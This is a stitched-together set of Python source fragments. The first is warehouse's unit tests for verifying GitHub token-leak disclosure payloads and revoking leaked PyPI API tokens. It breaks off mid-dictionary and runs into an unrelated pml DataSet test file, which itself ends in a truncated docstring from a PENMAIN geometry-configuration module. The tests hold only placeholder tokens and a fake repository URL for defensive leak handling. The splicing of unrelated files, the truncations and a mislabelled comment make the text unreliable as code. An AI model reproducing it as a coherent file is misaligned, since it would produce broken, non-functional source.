# tests/unit/integration/github/test_utils.py
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import json
import time
import uuid
import pretend
import pytest
import requests
from warehouse.integrations.github import tasks, utils
def test_token_leak_matcher_extract():
with pytest.raises(NotImplementedError):
utils.TokenLeakMatcher().extract("a")
def test_plain_text_token_leak_matcher_extract():
assert utils.PlainTextTokenLeakMatcher().extract("a") == "a"
def test_invalid_token_leak_request():
exc = utils.InvalidTokenLeakRequest("a", "b")
assert str(exc) == "a"
assert exc.reason == "b"
@pytest.mark.parametrize(
"record, error, reason",
[
(None, "Record is not a dict but: None", "format"),
({}, "Record is missing attribute(s): token, type, url", "format"),
(
{"type": "not_found", "token": "a", "url": "b"},
"Matcher with code not_found not found. "
"Available codes are: failer, pypi_api_token",
"invalid_matcher",
),
(
{"type": "failer", "token": "a", "url": "b"},
"Cannot extract token from recieved match",
"extraction",
),
],
)
def test_token_leak_disclosure_request_from_api_record_error(record, error, reason):
class MyFailingMatcher(utils.TokenLeakMatcher):
name = "failer"
def extract(self, text):
raise utils.ExtractionFailed()
with pytest.raises(utils.InvalidTokenLeakRequest) as exc:
utils.TokenLeakDisclosureRequest.from_api_record(
record, matchers={"failer": MyFailingMatcher(), **utils.TOKEN_LEAK_MATCHERS}
)
assert str(exc.value) == error
assert exc.value.reason == reason
def test_token_leak_disclosure_request_from_api_record():
request = utils.TokenLeakDisclosureRequest.from_api_record(
{"type": "pypi_api_token", "token": "<PASSWORD>", "url": "http://example.com"}
)
assert request.token == "<PASSWORD>"
assert request.public_url == "http://example.com"
class TestCache:
def test_set(self):
cache = utils.PublicKeysCache(cache_time=10)
cache.set(now=1, value="foo")
assert cache.cached_at == 1
assert cache.cache == "foo"
def test_get_no_cache(self):
cache = utils.PublicKeysCache(cache_time=10)
with pytest.raises(utils.CacheMiss):
cache.get(now=1)
def test_get_old_cache(self):
cache = utils.PublicKeysCache(cache_time=10)
cache.set(now=5, value="foo")
with pytest.raises(utils.CacheMiss):
cache.get(now=20)
def test_get_valid(self):
cache = utils.PublicKeysCache(cache_time=10)
cache.set(now=5, value="foo")
assert cache.get(now=10) == "foo"
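# A minimal sketch (not the warehouse implementation) of the cache behaviour that
# TestCache pins down above: a value stored at `cached_at` expires once `cache_time`
# seconds have elapsed, after which get() raises utils.CacheMiss again.
class _SketchPublicKeysCache:
    def __init__(self, cache_time):
        self.cache_time = cache_time
        self.cached_at = None
        self.cache = None

    def set(self, now, value):
        self.cached_at = now
        self.cache = value

    def get(self, now):
        if self.cached_at is None or now - self.cached_at >= self.cache_time:
            raise utils.CacheMiss
        return self.cache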
class TestGitHubTokenScanningPayloadVerifier:
def test_init(self):
metrics = pretend.stub()
session = pretend.stub()
token = "api_token"
url = "http://foo"
cache = utils.PublicKeysCache(cache_time=12)
verifier = utils.GitHubTokenScanningPayloadVerifier(
api_url=url,
session=session,
metrics=metrics,
api_token=token,
public_keys_cache=cache,
)
assert verifier._session is session
assert verifier._metrics is metrics
assert verifier._api_token == token
assert verifier._api_url == url
assert verifier._public_keys_cache is cache
def test_verify_cache_miss(self):
# Example taken from
# https://gist.github.com/ewjoachim/7dde11c31d9686ed6b4431c3ca166da2
meta_payload = {
"public_keys": [
{
"key_identifier": "90a421169f0a406205f1563a953312f0be898d3c"
"<KEY>",
"key": "-----BEGIN PUBLIC KEY-----\n"
"<KEY>"
"q\nkCmRCBnYERxZanmcpzQSXs1X/<KEY>"
"-----END PUBLIC KEY-----",
"is_current": True,
}
]
}
response = pretend.stub(
json=lambda: meta_payload, raise_for_status=lambda: None
)
session = pretend.stub(get=lambda *a, **k: response)
metrics = pretend.stub(increment=pretend.call_recorder(lambda str: None))
cache = utils.PublicKeysCache(cache_time=12)
verifier = utils.GitHubTokenScanningPayloadVerifier(
api_url="http://foo",
session=session,
metrics=metrics,
api_token="<PASSWORD>",
public_keys_cache=cache,
)
key_id = "<KEY>"
signature = (
"MEQCIAfgjgz6Ou/3DXMYZBervz1TKCHFsvwMcbuJhNZse622AiAG86/"
"cku2XdcmFWNHl2WSJi2fkE8t+auvB24eURaOd2A=="
)
payload = (
b'[{"type":"github_oauth_token","token":"cb4985f91<PASSWORD>c0234202299'
b'f43808034d7f5","url":" https://github.com/github/faketestrepo/blob/'
b'b0dd59c0b500650cacd4551ca5989a6194001b10/production.env"}]'
)
assert (
verifier.verify(payload=payload, key_id=key_id, signature=signature) is True
)
assert metrics.increment.calls == [
pretend.call("warehouse.token_leak.github.auth.cache.miss"),
pretend.call("warehouse.token_leak.github.auth.success"),
]
def test_verify_cache_hit(self):
session = pretend.stub()
metrics = pretend.stub(increment=pretend.call_recorder(lambda str: None))
cache = utils.PublicKeysCache(cache_time=12)
cache.cached_at = time.time()
cache.cache = [
{
"key_id": "90a421169f0a406205f1563a953312f0be898d3c"
"<KEY>",
"key": "-----BEGIN PUBLIC KEY-----\n"
"<KEY>"
"q\nkCmRCBnYERxZanmcpzQSXs1X/AljlKkbJ8qpVIW4clayyef9gWhFbNHWAA==\n"
"-----END PUBLIC KEY-----",
}
]
verifier = utils.GitHubTokenScanningPayloadVerifier(
api_url="http://foo",
session=session,
metrics=metrics,
api_token="<PASSWORD>",
public_keys_cache=cache,
)
key_id = "<KEY>"
signature = (
"MEQCIAfgjgz6Ou/3DXMYZBervz1TKCHFsvwMcbuJhNZse622AiAG86/"
"cku2XdcmFWNHl2WSJi2fkE8t+auvB24eURaOd2A=="
)
payload = (
b'[{"type":"github_oauth_token","token":"cb<PASSWORD>'
b'f43808034d7f5","url":" https://github.com/github/faketestrepo/blob/'
b'b0dd59c0b500650cacd4551ca5989a6194001b10/production.env"}]'
)
assert (
verifier.verify(payload=payload, key_id=key_id, signature=signature) is True
)
assert metrics.increment.calls == [
pretend.call("warehouse.token_leak.github.auth.cache.hit"),
pretend.call("warehouse.token_leak.github.auth.success"),
]
def test_verify_error(self):
metrics = pretend.stub(increment=pretend.call_recorder(lambda str: None))
cache = utils.PublicKeysCache(cache_time=12)
verifier = utils.GitHubTokenScanningPayloadVerifier(
api_url="http://foo",
session=pretend.stub(),
metrics=metrics,
api_token="<PASSWORD>",
public_keys_cache=cache,
)
verifier._retrieve_public_key_payload = pretend.raiser(
utils.InvalidTokenLeakRequest("Bla", "bla")
)
assert verifier.verify(payload={}, key_id="a", signature="a") is False
assert metrics.increment.calls == [
pretend.call("warehouse.token_leak.github.auth.cache.miss"),
pretend.call("warehouse.token_leak.github.auth.error.bla"),
]
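    # The "bla" suffix above comes from the exception's `reason`: verify() is
    # expected to catch InvalidTokenLeakRequest and increment
    # "warehouse.token_leak.github.auth.error.<reason>" before returning False.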
def test_headers_auth_no_token(self):
headers = utils.GitHubTokenScanningPayloadVerifier(
api_url="http://foo",
session=pretend.stub(),
metrics=pretend.stub(),
api_token=None,
public_keys_cache=pretend.stub(),
)._headers_auth()
assert headers == {}
def test_headers_auth_token(self):
headers = utils.GitHubTokenScanningPayloadVerifier(
api_url="http://foo",
session=pretend.stub(),
metrics=pretend.stub(),
api_token="<PASSWORD>-token",
public_keys_cache=pretend.stub(),
)._headers_auth()
assert headers == {"Authorization": "token api-token"}
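    # GitHub's token authentication scheme is "Authorization: token <value>";
    # with no API token configured, the verifier sends no Authorization header at all.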
def test_retrieve_public_key_payload(self):
meta_payload = {
"public_keys": [
{
"key_identifier": "90a421169f0a406205f1563a953312f0be898d3c"
"<KEY>",
"key": "-----BEGIN PUBLIC KEY-----\n"
"<KEY>"
"<KEY>"
"-----END PUBLIC KEY-----",
"is_current": True,
}
]
}
response = pretend.stub(
json=lambda: meta_payload, raise_for_status=lambda: None
)
session = pretend.stub(get=pretend.call_recorder(lambda *a, **k: response))
metrics = pretend.stub(increment=pretend.call_recorder(lambda str: None))
verifier = utils.GitHubTokenScanningPayloadVerifier(
api_url="http://foo",
session=session,
metrics=metrics,
api_token="api-token",
public_keys_cache=pretend.stub(),
)
assert verifier._retrieve_public_key_payload() == meta_payload
assert session.get.calls == [
pretend.call(
"http://foo",
headers={"Authorization": "token api-token"},
)
]
def test_get_cached_public_key_cache_hit(self):
metrics = pretend.stub()
session = pretend.stub()
cache = utils.PublicKeysCache(cache_time=12)
cache_value = pretend.stub()
cache.set(now=time.time(), value=cache_value)
verifier = utils.GitHubTokenScanningPayloadVerifier(
api_url="http://foo",
session=session,
metrics=metrics,
public_keys_cache=cache,
)
assert verifier._get_cached_public_keys() is cache_value
def test_get_cached_public_key_cache_miss_no_cache(self):
metrics = pretend.stub()
session = pretend.stub()
cache = utils.PublicKeysCache(cache_time=12)
verifier = utils.GitHubTokenScanningPayloadVerifier(
api_url="http://foo",
session=session,
metrics=metrics,
public_keys_cache=cache,
)
with pytest.raises(utils.CacheMiss):
verifier._get_cached_public_keys()
def test_retrieve_public_key_payload_http_error(self):
response = pretend.stub(
status_code=418,
text="I'm a teapot",
raise_for_status=pretend.raiser(requests.HTTPError),
)
session = pretend.stub(
get=lambda *a, **k: response,
)
verifier = utils.GitHubTokenScanningPayloadVerifier(
api_url="http://foo",
session=session,
metrics=pretend.stub(),
public_keys_cache=pretend.stub(),
)
with pytest.raises(utils.GitHubPublicKeyMetaAPIError) as exc:
verifier._retrieve_public_key_payload()
assert str(exc.value) == "Invalid response code 418: I'm a teapot"
assert exc.value.reason == "public_key_api.status.418"
def test_retrieve_public_key_payload_json_error(self):
response = pretend.stub(
text="Still a non-json teapot",
json=pretend.raiser(json.JSONDecodeError("", "", 3)),
raise_for_status=lambda: None,
)
session = pretend.stub(get=lambda *a, **k: response)
verifier = utils.GitHubTokenScanningPayloadVerifier(
api_url="http://foo",
session=session,
metrics=pretend.stub(),
public_keys_cache=pretend.stub(),
)
with pytest.raises(utils.GitHubPublicKeyMetaAPIError) as exc:
verifier._retrieve_public_key_payload()
assert str(exc.value) == "Non-JSON response received: Still a non-json teapot"
assert exc.value.reason == "public_key_api.invalid_json"
def test_retrieve_public_key_payload_connection_error(self):
session = pretend.stub(get=pretend.raiser(requests.ConnectionError))
verifier = utils.GitHubTokenScanningPayloadVerifier(
api_url="http://foo",
session=session,
metrics=pretend.stub(),
public_keys_cache=pretend.stub(),
)
with pytest.raises(utils.GitHubPublicKeyMetaAPIError) as exc:
verifier._retrieve_public_key_payload()
assert str(exc.value) == "Could not connect to GitHub"
assert exc.value.reason == "public_key_api.network_error"
def test_extract_public_keys(self):
meta_payload = {
"public_keys": [
{
"key_identifier": "90a421169f0a406205f1563a953312f0be898d3c"
"<KEY>",
"key": "-----BEGIN PUBLIC KEY-----\n"
"<KEY>"
"<KEY>"
"-----END PUBLIC KEY-----",
"is_current": True,
}
]
}
cache = utils.PublicKeysCache(cache_time=12)
verifier = utils.GitHubTokenScanningPayloadVerifier(
api_url="http://foo",
session=pretend.stub(),
metrics=pretend.stub(),
public_keys_cache=cache,
)
keys = verifier._extract_public_keys(pubkey_api_data=meta_payload)
assert keys == [
{
"key": "-----<KEY>"
"<KEY>"
"<KEY>-----END PUBLIC KEY-----",
"key_id": "90a421169f0a406205f1563a953312f0be"
"<KEY>",
}
]
assert cache.cache == keys
@pytest.mark.parametrize(
"payload, expected",
[
([], "Payload is not a dict but: []"),
({}, "Payload misses 'public_keys' attribute"),
({"public_keys": None}, "Payload 'public_keys' attribute is not a list"),
({"public_keys": [None]}, "Key is not a dict but: None"),
(
{"public_keys": [{}]},
"Missing attribute in key: ['key', 'key_identifier']",
),
(
{"public_keys": [{"key": "a"}]},
"Missing attribute in key: ['key_identifier']",
),
(
{"public_keys": [{"key_identifier": "a"}]},
"Missing attribute in key: ['key']",
),
],
)
def test_extract_public_keys_error(self, payload, expected):
cache = utils.PublicKeysCache(cache_time=12)
verifier = utils.GitHubTokenScanningPayloadVerifier(
api_url="http://foo",
session=pretend.stub(),
metrics=pretend.stub(),
public_keys_cache=cache,
)
with pytest.raises(utils.GitHubPublicKeyMetaAPIError) as exc:
list(verifier._extract_public_keys(pubkey_api_data=payload))
assert exc.value.reason == "public_key_api.format_error"
assert str(exc.value) == expected
assert cache.cache is None
def test_check_public_key(self):
verifier = utils.GitHubTokenScanningPayloadVerifier(
api_url="http://foo",
session=pretend.stub(),
metrics=pretend.stub(),
public_keys_cache=pretend.stub(),
)
keys = [
{"key_id": "a", "key": "b"},
{"key_id": "c", "key": "d"},
]
assert verifier._check_public_key(github_public_keys=keys, key_id="c") == "d"
def test_check_public_key_error(self):
verifier = utils.GitHubTokenScanningPayloadVerifier(
api_url="http://foo",
session=pretend.stub(),
metrics=pretend.stub(),
public_keys_cache=pretend.stub(),
)
with pytest.raises(utils.InvalidTokenLeakRequest) as exc:
verifier._check_public_key(github_public_keys=[], key_id="c")
assert str(exc.value) == "Key c not found in github public keys"
assert exc.value.reason == "wrong_key_id"
def test_check_signature(self):
verifier = utils.GitHubTokenScanningPayloadVerifier(
api_url="http://foo",
session=pretend.stub(),
metrics=pretend.stub(),
public_keys_cache=pretend.stub(),
)
public_key = (
"-----BEGIN PUBLIC KEY-----\n"
"<KEY>"
"<KEY>"
"-----END PUBLIC KEY-----"
)
signature = (
"MEQCIAfgjgz6Ou/3DXMYZBervz1TKCHFsvwMcbuJhNZse622AiAG86/"
"cku2XdcmFWNHl2WSJi2fkE8t+auvB24eURaOd2A=="
)
payload = (
b'[{"type":"github_oauth_token","token":"<PASSWORD>'
b'f43808034d7f5","url":" https://github.com/github/faketestrepo/blob/'
b'b0dd59c0b500650cacd4551ca5989a6194001b10/production.env"}]'
)
assert (
verifier._check_signature(
payload=payload, public_key=public_key, signature=signature
)
is None
)
def test_check_signature_invalid_signature(self):
verifier = utils.GitHubTokenScanningPayloadVerifier(
api_url="http://foo",
session=pretend.stub(),
metrics=pretend.stub(),
public_keys_cache=pretend.stub(),
)
public_key = (
"-----BEGIN PUBLIC KEY-----\n"
"MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE9MJJHnMfn2+H4xL4YaPDA4RpJqU"
"q\nkCmRCBnYERxZanmcpzQSXs1X/AljlKkbJ8qpVIW4clayyef9gWhFbNHWAA==\n"
"-----END PUBLIC KEY-----"
)
# Changed the initial N for an M
signature = (
"NEQCIAfgjgz6Ou/3DXMYZBervz1TKCHFsvwMcbuJhNZse622AiAG86/"
"cku2XdcmFWNHl2WSJi2fkE8t+auvB24eURaOd2A=="
)
payload = (
b'[{"type":"github_oauth_token","token":"<PASSWORD>'
b'f43808034d7f5","url":" https://github.com/github/faketestrepo/blob/'
b'b0dd59c0b500650cacd4551ca5989a6194001b10/production.env"}]'
)
with pytest.raises(utils.InvalidTokenLeakRequest) as exc:
verifier._check_signature(
payload=payload, public_key=public_key, signature=signature
)
assert str(exc.value) == "Invalid signature"
assert exc.value.reason == "invalid_signature"
def test_check_signature_invalid_crypto(self):
verifier = utils.GitHubTokenScanningPayloadVerifier(
api_url="http://foo",
session=pretend.stub(),
metrics=pretend.stub(),
public_keys_cache=pretend.stub(),
)
public_key = ""
signature = ""
payload = "yeah, nope, that won't pass"
with pytest.raises(utils.InvalidTokenLeakRequest) as exc:
verifier._check_signature(
payload=payload, public_key=public_key, signature=signature
)
assert str(exc.value) == "Invalid cryptographic values"
assert exc.value.reason == "invalid_crypto"
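# Hedged sketch of the kind of check the _check_signature tests above exercise:
# GitHub signs token-scanning payloads with ECDSA over SHA-256, the signature is
# base64-encoded, and the key arrives as a PEM public key. This uses the
# `cryptography` package directly and is illustrative, not the warehouse code.
def _sketch_verify_ecdsa_signature(payload: bytes, public_key_pem: str, signature_b64: str) -> None:
    import base64

    from cryptography.hazmat.primitives import hashes, serialization
    from cryptography.hazmat.primitives.asymmetric import ec

    key = serialization.load_pem_public_key(public_key_pem.encode("utf-8"))
    # Raises cryptography.exceptions.InvalidSignature if the payload was tampered with.
    key.verify(base64.b64decode(signature_b64), payload, ec.ECDSA(hashes.SHA256()))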
def test_analyze_disclosure(monkeypatch):
metrics = collections.Counter()
def metrics_increment(key):
metrics.update([key])
user_id = uuid.UUID(bytes=b"0" * 16)
user = pretend.stub(id=user_id)
database_macaroon = pretend.stub(
user=user, id=12, caveats={"permissions": "user"}, description="foo"
)
find = pretend.call_recorder(lambda *a, **kw: database_macaroon)
delete = pretend.call_recorder(lambda *a, **kw: None)
record_event = pretend.call_recorder(lambda *a, **kw: None)
svc = {
utils.IMetricsService: pretend.stub(increment=metrics_increment),
utils.IMacaroonService: pretend.stub(
find_from_raw=find, delete_macaroon=delete
),
utils.IUserService: pretend.stub(record_event=record_event),
}
request = pretend.stub(find_service=lambda iface, context: svc[iface])
send_email = pretend.call_recorder(lambda *a, **kw: None)
monkeypatch.setattr(utils, "send_token_compromised_email_leak", send_email)
utils.analyze_disclosure(
request=request,
disclosure_record={
"type": "pypi_api_token",
"token": "pypi-<PASSWORD>",
"url": "http://example.com",
},
origin="github",
)
assert metrics == {
"warehouse.token_leak.github.recieved": 1,
"warehouse.token_leak.github.processed": 1,
"warehouse.token_leak.github.valid": 1,
}
assert send_email.calls == [
pretend.call(request, user, public_url="http://example.com", origin="github")
]
assert find.calls == [pretend.call(raw_macaroon="pypi-1234")]
assert delete.calls == [pretend.call(macaroon_id="12")]
assert record_event.calls == [
pretend.call(
user_id,
tag="account:api_token:removed_leak",
ip_address="127.0.0.1",
additional={
"macaroon_id": | |
# Copyright (C) 2012 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
"""
Unit tests for the model module.
@author: drusk
"""
import unittest
import numpy as np
import pandas as pd
from hamcrest import (assert_that, contains, contains_inanyorder, has_length,
equal_to)
from pml.data.model import DataSet, as_dataset
from pml.data import loader
from pml.utils.errors import InconsistentSampleIdError
from pml.utils.errors import UnlabelledDataSetError
from test import base_tests
from test.matchers.pml_matchers import equals_dataset
from test.matchers.pandas_matchers import equals_series, equals_dataframe
class DataSetTest(base_tests.BaseDataSetTest, base_tests.BaseFileLoadingTest):
def test_create_dataset_from_numpy_array(self):
as_list = [[0, 1], [2, 3]]
np_array = np.array(as_list)
dataset = DataSet(np_array)
assert_that(dataset, equals_dataset(as_list))
def test_reduce_rows(self):
dataset = DataSet([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
reduced = dataset.reduce_rows(sum)
assert_that(reduced.values, contains(6, 15, 24))
def test_reduce_features(self):
dataset = DataSet([[4, 9, 8], [2, 1, 7], [5, 6, 1]])
reduced = dataset.reduce_features(min)
assert_that(reduced.values, contains(2, 1, 1))
def test_drop_column(self):
original = DataSet([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
self.assertEqual(original.num_features(), 3)
filtered = original.drop_column(1)
self.assertEqual(filtered.num_features(), 2)
assert_that(filtered, equals_dataset([[1, 3], [4, 6], [7, 9]]))
# make sure original unchanged
self.assertEqual(original.num_features(), 3)
assert_that(original, equals_dataset([[1, 2, 3], [4, 5, 6],
[7, 8, 9]]))
def test_drop_column_keeps_labels(self):
original = self.create_dataset(labels=["cat", "dog", "bird"],
num_features=3)
filtered = original.drop_column(1)
assert_that(filtered.get_labels(), contains("cat", "dog", "bird"))
def test_drop_empty_samples(self):
df = pd.DataFrame([[1, 2, np.NAN], [np.NAN, np.NAN, np.NAN], [7, 8, 9]])
original = DataSet(df, labels=["a", "b", "c"])
filtered = original.drop_empty_samples()
assert_that(filtered.feature_list(), has_length(3))
assert_that(filtered.num_samples(), equal_to(2))
assert_that(filtered, equals_dataset([[1, 2, np.NAN], [7, 8, 9]]))
assert_that(filtered.get_labels(), contains("a", "c"))
def test_drop_empty_samples_original_unchanged(self):
data_list = [[1, 2, np.NAN], [np.NAN, np.NAN, np.NAN], [7, 8, 9]]
label_list = ["a", "b", "c"]
original = DataSet(pd.DataFrame(data_list), labels=label_list)
filtered = original.drop_empty_samples()
filtered.set_column(0, [-1, -1])
filtered.labels[0] = "z"
assert_that(original, equals_dataset(data_list))
assert_that(original.get_labels(), contains(*label_list))
def test_get_column(self):
dataset = DataSet([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
column1 = dataset.get_column(1)
assert_that(column1.values, contains(2, 5, 8))
def test_get_column_set_value(self):
dataset = DataSet([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
dataset.get_column(1)[:] = 1
assert_that(dataset.get_column(1), contains(1, 1, 1))
def test_set_column(self):
dataset = DataSet([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
dataset.set_column(1, [11, 11, 11])
assert_that(dataset, equals_dataset([[1, 11, 3], [4, 11, 6],
[7, 11, 9]]))
def test_set_new_column(self):
dataset = DataSet([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
dataset.set_column(3, [11, 11, 11])
assert_that(dataset, equals_dataset([[1, 2, 3, 11], [4, 5, 6, 11],
[7, 8, 9, 11]]))
def test_slice_features_list_string(self):
df = pd.DataFrame([[1, 2, 3], [4, 5, 6], [7, 8, 9]],
columns=["weight", "height", "age"])
labels = ["m", "f", "m"]
dataset = DataSet(df, labels=labels)
sliced = dataset.slice_features(["weight", "height"])
assert_that(sliced, equals_dataset([[1, 2], [4, 5], [7, 8]]))
assert_that(sliced.feature_list(), contains("weight", "height"))
assert_that(sliced.get_labels(), contains(*labels))
def test_slice_features_list_indices(self):
df = pd.DataFrame([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
labels = ["m", "f", "m"]
dataset = DataSet(df, labels=labels)
sliced = dataset.slice_features([1, 2])
assert_that(sliced, equals_dataset([[2, 3], [5, 6], [8, 9]]))
assert_that(sliced.feature_list(), contains(1, 2))
assert_that(sliced.get_labels(), contains(*labels))
def test_slice_features_original_unchanged(self):
df = pd.DataFrame([[1, 2, 3], [4, 5, 6], [7, 8, 9]],
columns=["weight", "height", "age"])
labels = ["m", "f", "m"]
dataset = DataSet(df, labels=labels)
sliced = dataset.slice_features(["weight", "height"])
# Modify sliced data
sliced.set_column("weight", [0, 0, 0])
sliced.labels[0] = "x"
# Check that it was indeed changed
assert_that(sliced.get_column("weight"), contains(0, 0, 0))
assert_that(sliced.get_labels(), contains("x", "f", "m"))
# Verify it was not changed in the original dataset
assert_that(dataset.get_column("weight"), contains(1, 4, 7))
assert_that(dataset.get_labels(), contains(*labels))
def test_get_rows(self):
dataset = DataSet([[1, 2], [3, 4], [5, 6], [7, 8]])
selection = dataset.get_rows([1, 3])
self.assertEqual(selection.num_samples(), 2)
assert_that(selection, equals_dataset([[3, 4], [7, 8]]))
def test_get_labelled_rows(self):
dataset = DataSet([[1, 2], [3, 4], [5, 6], [7, 8]],
labels=["a", "a", "b", "b"])
selection = dataset.get_rows([1, 3])
self.assertEqual(selection.num_samples(), 2)
self.assertTrue(selection.is_labelled())
# TODO incorporate labels equals_series into DataSet matcher?
assert_that(selection, equals_dataset([[3, 4], [7, 8]]))
assert_that(selection.get_labels(), equals_series({1: "a", 3: "b"}))
def test_get_label_value_counts(self):
dataset = DataSet([[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12]],
labels=["a", "b", "b", "c", "a", "b"])
expected = {"a": 2, "b": 3, "c": 1}
value_counts = dataset.get_label_value_counts()
assert_that(value_counts, equals_series(expected))
assert_that(value_counts.index, contains("b", "a", "c"))
def test_get_label_set(self):
dataset = DataSet([[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12]],
labels=["a", "b", "b", "c", "a", "b"])
assert_that(dataset.get_label_set(), contains_inanyorder("a", "b", "c"))
def test_get_label_empty_set(self):
dataset = DataSet([[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12]])
assert_that(dataset.get_label_set(), has_length(0))
def test_get_label_value_counts_no_labels(self):
dataset = DataSet([[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12]])
assert_that(dataset.get_label_value_counts(), equals_series({}))
def test_split(self):
dataset = DataSet([[1, 2], [3, 4], [5, 6], [7, 8]])
first, second = dataset.split(0.5)
self.assertEqual(first.num_samples(), 2)
assert_that(first, equals_dataset([[1, 2], [3, 4]]))
self.assertEqual(second.num_samples(), 2)
assert_that(second, equals_dataset([[5, 6], [7, 8]]))
def test_unequal_split(self):
dataset = DataSet([[1, 2], [3, 4], [5, 6], [7, 8]])
first, second = dataset.split(0.3)
self.assertEqual(first.num_samples(), 1)
assert_that(first, equals_dataset([[1, 2]]))
self.assertEqual(second.num_samples(), 3)
assert_that(second, equals_dataset([[3, 4], [5, 6], [7, 8]]))
def test_split_0(self):
dataset = DataSet([[1, 2], [3, 4], [5, 6], [7, 8]])
first, second = dataset.split(0)
self.assertEqual(first.num_samples(), 0)
assert_that(first, equals_dataset([]))
self.assertEqual(second.num_samples(), 4)
assert_that(second, equals_dataset([[1, 2], [3, 4], [5, 6], [7, 8]]))
def test_split_invalid_percent(self):
dataset = DataSet([[1, 2], [3, 4], [5, 6], [7, 8]])
self.assertRaises(ValueError, dataset.split, 50)
def test_split_random(self):
dataset = DataSet([[1, 2], [3, 4], [5, 6], [7, 8]])
first, second = dataset.split(0.5, random=True)
# since the split is random, can't assert that first or second
# contain particular rows, just the number of rows
self.assertEqual(first.num_samples(), 2)
self.assertEqual(second.num_samples(), 2)
def test_fill_missing(self):
dataset = DataSet([[1, np.NaN, 3], [np.NaN, 5, np.NaN]])
dataset.fill_missing(0)
assert_that(dataset, equals_dataset([[1, 0, 3], [0, 5, 0]]))
def test_fill_missing_with_feature_means(self):
dataset = DataSet([[2, np.NaN, np.NaN], [np.NaN, 6, 10],
[5, 4, np.NaN]])
dataset.fill_missing_with_feature_means()
assert_that(dataset, equals_dataset([[2, 5, 10], [3.5, 6, 10],
[5, 4, 10]]))
def test_fill_missing_with_feature_means_feature_all_empty(self):
dataset = DataSet([[2, np.NaN, np.NaN], [7, np.NaN, 10],
[5, np.NaN, np.NaN]])
dataset.fill_missing_with_feature_means()
assert_that(dataset, equals_dataset([[2, 0, 10], [7, 0, 10],
[5, 0, 10]]))
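    # Equivalent pandas behaviour (illustrative, not the pml implementation):
    # df.fillna(df.mean()).fillna(0) replaces each NaN with its column mean and
    # maps columns that are entirely NaN to 0, matching the two tests above.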
def test_split_labelled(self):
dataset = DataSet([[1, 2], [3, 4], [5, 6], [7, 8]],
labels=["b", "b", "b", "a"])
first, second = dataset.split(0.5)
self.assertTrue(first.is_labelled())
assert_that(first.get_labels(), equals_series({0: "b", 1: "b"}))
self.assertTrue(second.is_labelled())
assert_that(second.get_labels(), equals_series({2: "b", 3: "a"}))
def test_split_in_half_using_labels(self):
labels = ["a", "a", "a", "a", "b", "b", "b", "b"]
dataset = self.create_dataset(labels=labels,
sample_ids=range(len(labels)))
first, second = dataset.split(0.5, using_labels=True)
assert_that(first.get_labels(),
contains_inanyorder("a", "a", "b", "b"))
assert_that(second.get_labels(),
contains_inanyorder("a", "a", "b", "b"))
def test_split_ratio_using_labels(self):
labels = ["a", "a", "b", "a", "b", "a", "b", "b", "a", "a"]
dataset = self.create_dataset(labels=labels,
sample_ids=range(len(labels)))
first, second = dataset.split(0.75, using_labels=True)
assert_that(first.get_labels(),
contains_inanyorder("a", "a", "a", "a", "b", "b", "b"))
assert_that(second.get_labels(),
contains_inanyorder("a", "a", "b"))
def test_split_unlabelled_using_labels(self):
dataset = self.create_dataset(labels=None)
self.assertRaises(
UnlabelledDataSetError,
dataset.split,
0.5, using_labels=True
)
def test_split_missing_indices(self):
labels = pd.Series(["a", "b", "c", "d"], index=[1, 2, 3, 5])
dataset = self.create_dataset(sample_ids=[1, 2, 3, 5], labels=labels)
first, second = dataset.split(0.5)
assert_that(first.get_sample_ids(), contains(1, 2))
assert_that(first.get_labels(), contains("a", "b"))
assert_that(second.get_sample_ids(), contains(3, 5))
assert_that(second.get_labels(), contains("c", "d"))
def test_get_row(self):
dataset = DataSet([[1, 2], [3, 4], [5, 6], [7, 8]])
row = dataset.get_row(1)
assert_that(row.values, contains(3, 4))
# check that changes made to selected row are reflected in original
row[:] = 1
assert_that(dataset.get_row(1), contains(1, 1))
def test_get_row_by_id(self):
df = pd.DataFrame([[1, 2, 3], [4, 5, 6], [7, 8, 9]],
index=["V01", "V02", "V03"])
dataset = DataSet(df)
the material structure are normally identified
by the sequential labels assigned by PENGEOM. For complex
geometries, however, it may be more practical to employ user
labels, i.e., the four-character strings that identify the
body in the geometry definition file. In PENMAIN (and only
in the parts of the code that follow the definition of the
geometry), a body can be specified by giving either its
PENGEOM numerical label or its user label enclosed in a
pair of apostrophes (e.g., 'BOD1'). However, bodies that
result from the cloning of modules (as well as those defined
in an INCLUDEd geometry file) do not have a user label and
only the PENGEOM numerical label is acceptable.
"""
def __init__(self):
super().__init__("GEOMFN", (str,), comment="Geometry file, up to 20 chars")
